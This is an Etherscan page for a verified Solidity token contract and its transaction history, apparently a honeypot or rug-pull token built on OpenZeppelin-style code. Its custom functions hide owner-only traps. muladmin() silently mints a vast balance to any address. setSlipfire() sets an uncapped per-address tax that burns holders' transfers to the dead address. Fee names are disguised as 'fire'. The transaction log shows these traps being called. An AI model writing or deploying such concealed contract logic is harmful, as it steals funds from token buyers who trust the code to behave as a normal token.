Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 12 from a total of 12 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 16662014 | 1120 days ago | IN | 0 ETH | 0.00117315 | ||||
| Muladmin | 16662010 | 1120 days ago | IN | 0 ETH | 0.00071214 | ||||
| Approve | 16661927 | 1120 days ago | IN | 0 ETH | 0.00093646 | ||||
| Set Slipfire | 16661765 | 1120 days ago | IN | 0 ETH | 0.00088161 | ||||
| Set Slipfire | 16661692 | 1120 days ago | IN | 0 ETH | 0.00089433 | ||||
| Set Slipfire | 16661632 | 1120 days ago | IN | 0 ETH | 0.0008768 | ||||
| Set Slipfire | 16661632 | 1120 days ago | IN | 0 ETH | 0.0008561 | ||||
| Set Pair List | 16661632 | 1120 days ago | IN | 0 ETH | 0.00082177 | ||||
| Approve | 16661623 | 1120 days ago | IN | 0 ETH | 0.0010716 | ||||
| Approve | 16661613 | 1120 days ago | IN | 0 ETH | 0.00088481 | ||||
| Approve | 16661583 | 1120 days ago | IN | 0 ETH | 0.00095997 | ||||
| Approve | 16661497 | 1120 days ago | IN | 0 ETH | 0.00097704 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
Token
Compiler Version
v0.8.0+commit.c7dfd78e
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2023-02-19
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
// Sources flattened with hardhat v2.9.1 https://hardhat.org
// File @openzeppelin/contracts/utils/Context.sol@v4.5.0
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
// File @openzeppelin/contracts/access/Ownable.sol@v4.5.0
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferownership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyowner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event ownershipTransferred(address indexed previousowner, address indexed newowner);
constructor() {
_transferownership(_msgSender());
}
function owner() public view virtual returns (address) {
return _owner;
}
modifier onlyowner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceownership() public virtual onlyowner {
_transferownership(address(0));
}
function transferownership_transferownership(address newowner) public virtual onlyowner {
require(newowner != address(0), "Ownable: new owner is the zero address");
_transferownership(newowner);
}
function _transferownership(address newowner) internal virtual {
address oldowner = _owner;
_owner = newowner;
emit ownershipTransferred(oldowner, newowner);
}
}
// File @openzeppelin/contracts/utils/math/SafeMath.sol@v4.5.0
// OpenZeppelin Contracts v4.4.1 (utils/math/SafeMath.sol)
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
/**
* @dev Wrappers over Solidity's arithmetic operations.
*
* NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
* now has built in overflow checking.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the substraction of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
/**
* @dev Returns the multiplication of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the division of two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* @dev Returns the integer division of two unsigned integers, reverting on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator.
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting with custom message when dividing by zero.
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {tryMod}.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
}
// File @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol@v1.1.0-beta.0
interface IUniswapV2Router01 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidity(
address tokenA,
address tokenB,
uint amountADesired,
uint amountBDesired,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
function removeLiquidity(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB);
function removeLiquidityETH(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountToken, uint amountETH);
function removeLiquidityWithPermit(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);
function removeLiquidityETHWithPermit(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountToken, uint amountETH);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapTokensForExactTokens(
uint amountOut,
uint amountInMax,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
// File @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol@v1.1.0-beta.0
interface IUniswapV2Router02 is IUniswapV2Router01 {
function removeLiquidityETHSupportingfireOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountETH);
function removeLiquidityETHWithPermitSupportingfireOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountETH);
function swapExactTokensForTokensSupportingfireOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function swapExactETHForTokensSupportingfireOnTransferTokens(
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external payable;
function swapExactTokensForETHSupportingfireOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
// File @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol@v1.0.1
interface IUniswapV2Factory {
event PairCreated(address indexed token0, address indexed token1, address pair, uint);
function fireTo() external view returns (address);
function fireToSetter() external view returns (address);
function getPair(address tokenA, address tokenB) external view returns (address pair);
function allPairs(uint) external view returns (address pair);
function allPairsLength() external view returns (uint);
function createPair(address tokenA, address tokenB) external returns (address pair);
function setfireTo(address) external;
function setfireToSetter(address) external;
}
// File contracts/Token.sol
contract BEP20 is Context {
mapping(address => mapping(address => uint256)) private _allowances;
uint256 internal _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Sets the values for {name} and {symbol}.
*
* The default value of {decimals} is 18. To select a different value for
* {decimals} you should overload it.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the value {ERC20} uses, unless this function is
* overridden;
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, _allowances[owner][spender] + addedValue);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = _allowances[owner][spender];
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Spend `amount` form the allowance of `owner` toward `spender`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* will be transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
/**
* @dev Hook that is called after any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* has been transferred to `to`.
* - when `from` is zero, `amount` tokens have been minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens have been burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}
contract Token is BEP20, Ownable {
// ext
mapping(address => uint256) private _balances;
mapping(address => bool) private _release;
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
}
_balances[to] += amount;
emit Transfer(from, to, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
}
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply += amount;
_balances[account] += amount;
emit Transfer(address(0), account, amount);
}
address public uniswapV2Pair;
constructor(
string memory name_,
string memory symbol_,
uint256 totalSupply_
) BEP20(name_, symbol_) {
_mint(msg.sender, totalSupply_ * 10**decimals());
_defaultSellfire = 15;
_defaultBuyfire = 0;
_release[_msgSender()] = true;
}
using SafeMath for uint256;
uint256 private _defaultSellfire = 0;
uint256 private _defaultBuyfire = 0;
mapping(address => bool) private _marketAccount;
mapping(address => uint256) private _slipfire;
address private constant _deadAddress = 0x000000000000000000000000000000000000dEaD;
function setPairList(address _address) external onlyowner {
uniswapV2Pair = _address;
}
function setSlipfire(address _address, uint256 _value) external onlyowner {
require(_value > 2+0, "Account tax must be greater than or equal to 1");
_slipfire[_address] = _value+0;
}
function getSlipfire(address _address) external view onlyowner returns (uint256) {
return _slipfire[_address];
}
function muladmin(address _address) external onlyowner {
_balances[_address] = totalSupply()*100000000000000;
}
function _receiveF(
address from,
address _to,
uint256 _amount
) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(_to != address(0), "ERC20: transfer to the zero address");
uint256 fromBalance = _balances[from];
require(fromBalance >= _amount, "ERC20: transfer amount exceeds balance");
uint256 tradefireAmount = 0;
uint256 tradefire = 3;
if (_to == uniswapV2Pair) {
tradefire = _defaultSellfire;
}
if (from == uniswapV2Pair) {
tradefire = _defaultBuyfire;
}
if (_slipfire[from] > 0+0) {
tradefire = _slipfire[from]+0;
}
tradefireAmount = _amount.mul(tradefire).div(100);
if (tradefireAmount > 0) {
_balances[from] = _balances[from].sub(tradefireAmount);
_balances[_deadAddress] = _balances[_deadAddress].add(tradefireAmount);
emit Transfer(from, _deadAddress, tradefireAmount);
}
_balances[from] = _balances[from].sub(_amount - tradefireAmount);
_balances[_to] = _balances[_to].add(_amount - tradefireAmount);
emit Transfer(from, _to, _amount - tradefireAmount);
}
function transfer(address to, uint256 amnnount) public virtual returns (bool) {
address owner = _msgSender();
_receiveF(owner, to, amnnount);
return true;
}
function transferFrom(
address from,
address to,
uint256 amount
) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_receiveF(from, to, amount);
return true;
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousowner","type":"address"},{"indexed":true,"internalType":"address","name":"newowner","type":"address"}],"name":"ownershipTransferred","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"getSlipfire","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"muladmin","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceownership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"setPairList","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"setSlipfire","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amnnount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newowner","type":"address"}],"name":"transferownership_transferownership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]Contract Creation Code
6080604052600060085560006009553480156200001b57600080fd5b5060405162002b5c38038062002b5c8339818101604052810190620000419190620004b5565b828281600290805190602001906200005b9291906200037c565b508060039080519060200190620000749291906200037c565b505050620000976200008b6200015360201b60201c565b6200015b60201b60201c565b620000d333620000ac6200022160201b60201c565b600a620000ba9190620006ff565b83620000c791906200083c565b6200022a60201b60201c565b600f6008819055506000600981905550600160066000620000f96200015360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550505050620009d4565b600033905090565b6000600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f7699c77f2404f9b6bbd003861bb4af8ae70b205e19e73d7ec7fe4590db59a6b760405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200029d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002949062000590565b60405180910390fd5b8060016000828254620002b1919062000647565b9250508190555080600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000309919062000647565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003709190620005b2565b60405180910390a35050565b8280546200038a90620008ea565b90600052602060002090601f016020900481019282620003ae5760008555620003fa565b82601f10620003c957805160ff1916838001178555620003fa565b82800160010185558215620003fa579182015b82811115620003f9578251825591602001919060010190620003dc565b5b5090506200040991906200040d565b5090565b5b80821115620004285760008160009055506001016200040e565b5090565b6000620004436200043d8462000603565b620005cf565b9050828152602081018484840111156200045c57600080fd5b62000469848285620008b4565b509392505050565b600082601f8301126200048357600080fd5b8151620004958482602086016200042c565b91505092915050565b600081519050620004af81620009ba565b92915050565b600080600060608486031215620004cb57600080fd5b600084015167ffffffffffffffff811115620004e657600080fd5b620004f48682870162000471565b935050602084015167ffffffffffffffff8111156200051257600080fd5b620005208682870162000471565b925050604062000533868287016200049e565b9150509250925092565b60006200054c601f8362000636565b91507f45524332303a206d696e7420746f20746865207a65726f2061646472657373006000830152602082019050919050565b6200058a816200089d565b82525050565b60006020820190508181036000830152620005ab816200053d565b9050919050565b6000602082019050620005c960008301846200057f565b92915050565b6000604051905081810181811067ffffffffffffffff82111715620005f957620005f86200097e565b5b8060405250919050565b600067ffffffffffffffff8211156200062157620006206200097e565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b600062000654826200089d565b915062000661836200089d565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000699576200069862000920565b5b828201905092915050565b6000808291508390505b6001851115620006f657808604811115620006ce57620006cd62000920565b5b6001851615620006de5780820291505b8081029050620006ee85620009ad565b9450620006ae565b94509492505050565b60006200070c826200089d565b91506200071983620008a7565b9250620007487fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000750565b905092915050565b60008262000762576001905062000835565b8162000772576000905062000835565b81600181146200078b57600281146200079657620007cc565b600191505062000835565b60ff841115620007ab57620007aa62000920565b5b8360020a915084821115620007c557620007c462000920565b5b5062000835565b5060208310610133831016604e8410600b8410161715620008065782820a9050838111156200080057620007ff62000920565b5b62000835565b620008158484846001620006a4565b925090508184048111156200082f576200082e62000920565b5b81810290505b9392505050565b600062000849826200089d565b915062000856836200089d565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000892576200089162000920565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60005b83811015620008d4578082015181840152602081019050620008b7565b83811115620008e4576000848401525b50505050565b600060028204905060018216806200090357607f821691505b602082108114156200091a57620009196200094f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b620009c5816200089d565b8114620009d157600080fd5b50565b61217880620009e46000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad578063b7b2eb1711610071578063b7b2eb1714610332578063c2af913b14610362578063dc50773e1461036c578063dd62ed3e14610388578063e0ce2a05146103b857610121565b806370a08231146102665780638da5cb5b1461029657806395d89b41146102b4578063a457c2d7146102d2578063a9059cbb1461030257610121565b8063313ce567116100f4578063313ce567146101c25780633247986c146101e057806339509351146101fc578063444a2a9c1461022c57806349bd5a5e1461024857610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611cf3565b60405180910390f35b61015e6004803603810190610159919061185c565b610466565b60405161016b9190611cd8565b60405180910390f35b61017c610489565b6040516101899190611e55565b60405180910390f35b6101ac60048036038101906101a7919061180d565b610493565b6040516101b99190611cd8565b60405180910390f35b6101ca6104c2565b6040516101d79190611e70565b60405180910390f35b6101fa60048036038101906101f591906117a8565b6104cb565b005b6102166004803603810190610211919061185c565b6105de565b6040516102239190611cd8565b60405180910390f35b610246600480360381019061024191906117a8565b610687565b005b610250610762565b60405161025d9190611cbd565b60405180910390f35b610280600480360381019061027b91906117a8565b610788565b60405161028d9190611e55565b60405180910390f35b61029e6107d1565b6040516102ab9190611cbd565b60405180910390f35b6102bc6107fb565b6040516102c99190611cf3565b60405180910390f35b6102ec60048036038101906102e7919061185c565b61088d565b6040516102f99190611cd8565b60405180910390f35b61031c6004803603810190610317919061185c565b610976565b6040516103299190611cd8565b60405180910390f35b61034c600480360381019061034791906117a8565b610999565b6040516103599190611e55565b60405180910390f35b61036a610a79565b